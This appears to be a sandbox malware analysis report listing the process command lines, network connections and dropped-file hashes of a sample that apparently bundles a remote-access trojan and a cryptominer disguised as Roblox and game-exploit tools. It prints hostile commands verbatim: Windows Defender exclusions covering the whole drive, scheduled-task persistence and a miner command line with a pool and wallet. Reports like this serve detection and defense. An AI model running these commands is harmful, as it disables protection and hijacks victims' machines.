
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcjwnium\hcjwnium.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CC.tmp" "c:\DriversavessessionDlldhcp\CSC559EE64D83AC4A8280A5A24C5B60E145.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnbjk2l\flnbjk2l.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1297.tmp" "c:\MSOCache\All Users\CSCF356FD83CFB9430EA0EF1F52A39F846.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4veo0d4h\4veo0d4h.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1304.tmp" "c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5rfmmif\l5rfmmif.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1381.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqleqlab\kqleqlab.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13CF.tmp" "c:\Users\All Users\Microsoft\Windows\CSC13970AFFC3FB4AE3A9F39E5D723D41AB.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aryds0rx\aryds0rx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES141D.tmp" "c:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\CSC1DB539DCA86D44AD86BABAAFDEA71AB9.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j10hzyo0\j10hzyo0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147A.tmp" "c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq3esore\xq3esore.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E8.tmp" "c:\Users\Admin\Music\CSC9B0B8199D9CF45F6B333935465BB2D70.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yeijp43\4yeijp43.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1545.tmp" "c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\winNet\WerFault.exe

"C:\winNet\WerFault.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Roblox.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "909049509-6533765031900255637-2070495065-305685155-1046318106-855059111423792356"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "6937931028219448122055107728-1831467133735503772-661204874-1257183238690169128"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VyvJW8hwqz.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\Roblox.exe

"C:\Users\Admin\AppData\Local\Roblox.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.23.46:443 www.nodejs.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 article-coal.gl.at.ply.gg udp
US 8.8.8.8:53 api.telegram.org udp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 aka.ms udp
GB 2.17.6.114:443 aka.ms tcp
US 147.185.221.21:27263 article-coal.gl.at.ply.gg tcp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
FI 77.105.133.52:80 ozero.top tcp

Files

\Users\Admin\AppData\Local\Temp\Youtube.exe

MD5 d25ebdfc04bdadea74017fa72f90781f
SHA1 f7278c4d04fc4db888368e0245d7607d8bcbb557
SHA256 9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
SHA512 77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

MD5 54276fc2dfafc0b610f08ba739a0f5ee
SHA1 dc61f3b768f2b1423c949d0ce761606f594aee8c
SHA256 9bb53f37a4b196c0031047936fbf6f029aa845d4610e77cabed1d370f04f229b
SHA512 9d5ed9cab660d270e4749d51bc4aefd251c64e6bd90fe70588668002522ac00148a33f03a1127141772f42c7e7a0510b3218a89e9e1209836cebb3371dbceb22

memory/1976-19-0x0000000000400000-0x0000000000D8F000-memory.dmp

memory/2372-21-0x0000000000E20000-0x0000000000EA0000-memory.dmp

\Users\Admin\AppData\Local\Temp\Result.exe

MD5 170b43350048ed4b6fca0e50a0178621
SHA1 db863b7b04a7c58baa9120e2f184517ed27a7252
SHA256 248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
SHA512 e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

MD5 7d4b84a8c3d14cb3d1bb864719463404
SHA1 544cf51aec717c63552f0fdf97d364b1b62a7a0c
SHA256 3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663
SHA512 d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

\Users\Admin\AppData\Local\Temp\solara.exe

MD5 1797c0e37f4b9dd408cbf0d7bfcb7c95
SHA1 10df695351ac6074e23a3d3b4bd31a17c10fd614
SHA256 8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb
SHA512 52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

